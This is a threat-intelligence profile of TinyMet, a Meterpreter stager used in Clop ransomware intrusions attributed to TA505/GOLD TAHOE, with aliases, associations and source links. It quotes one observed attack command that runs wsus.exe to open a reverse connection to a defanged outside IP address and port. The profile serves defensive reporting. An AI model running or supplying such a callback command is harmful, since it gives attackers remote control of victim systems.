Tinymet

Malware Profile Updated 3 months ago
Download STIX
Preview STIX
TinyMet is a type of malware, specifically a tiny, flexible Meterpreter stager, that can infiltrate systems and cause significant damage. It has been used by threat actors like GOLD TAHOE to retrieve the TinyMet Meterpreter stager in Clop ransomware incidents. This harmful program can infect your system through suspicious downloads, emails, or websites and once inside, it can steal personal information, disrupt operations, or even hold your data hostage for ransom. The malware was observed being executed with the command c:\intel\wsus.exe 1 91.214.124[.]20 43434, indicating a reverse HTTP connection, and connected to a malicious IP address by either renaming a binary or providing specific arguments. The investigation into these incidents revealed that the threat actor has a possible link to the TinyMet Payload v0.2. This payload was previously used by Clop Ransomware as a precursor for the TA505 Post-Exploitation Operation. The use of this payload indicates a sophisticated level of attack planning and execution, suggesting that the threat actors are experienced and highly skilled. Our team discovered a file named wsus.exe, which appears to be a version of TinyMet, along with three additional files that were created and executed on the first compromised system. This file primarily operates as a version of TinyMet—an open-source Meterpreter stager—but the actors also have the option to store and execute any binary loaded into the table. This flexibility allows the threat actors to adapt their approach based on the specific vulnerabilities of the targeted system.
What's your take? (Question 1 of 5)
Help tune the shared Cybergeist dataset, assist your peers, and earn karma. Expand the panel to get started.
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.
IDVotesProfile Description
Meterpreter Stager
2
The Meterpreter stager is a type of malware, which is malicious software designed to infiltrate and exploit computer systems. It can enter your system through suspicious downloads, emails, or websites, often unbeknownst to the user. Once inside, it has the potential to steal personal information, di
Meterpreter
2
Meterpreter, a type of malware, is an attack payload of Metasploit that serves as an interactive shell, enabling threat actors to control and execute code on a system. Advanced Persistent Threat (APT) actors have created and used a variant of Metasploit (Meterpreter) on the ServiceDesk system, liste
wsus.exe
1
None
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Ransomware
Payload
Exploit
Associated Malware
To see the evidence that has resulted in this association, create a free account
IDTypeVotesProfile Description
ClopUnspecified
2
Clop is a notorious malware, short for malicious software, known for its disruptive and damaging effects on computer systems. It primarily infiltrates systems through suspicious downloads, emails, or websites, often unbeknownst to the user. Once inside, Clop can steal personal information, disrupt o
Associated Threat Actors
To see the evidence that has resulted in this association, create a free account
IDTypeVotesProfile Description
TA505Unspecified
1
TA505, also known as Cl0p Ransomware Gang and Lace Tempest, is a highly active and sophisticated cybercriminal group. The group has been associated with various high-profile cyber-attacks, demonstrating adaptability through a multi-vector approach to their operations. In June 2023, the U.S. Cybersec
Associated Vulnerabilities
To see the evidence that has resulted in this association, create a free account
IDTypeVotesProfile Description
No associations to display
Source Document References
Information about the Tinymet Malware was read from the documents corpus below. This display is limited to 20 results, create a free account to see more
SourceCreatedAtTitle
Secureworks
a year ago
Phases of a Post-Intrusion Ransomware Attack
MITRE
a year ago
Egregor Ransomware – A Deep Dive Into Its Activities and Techniques
MITRE
a year ago
FIN7 Revisited: Inside Astra Panel and SQLRat Malware
MITRE
a year ago
TA505 Continues to Infect Networks With SDBbot RAT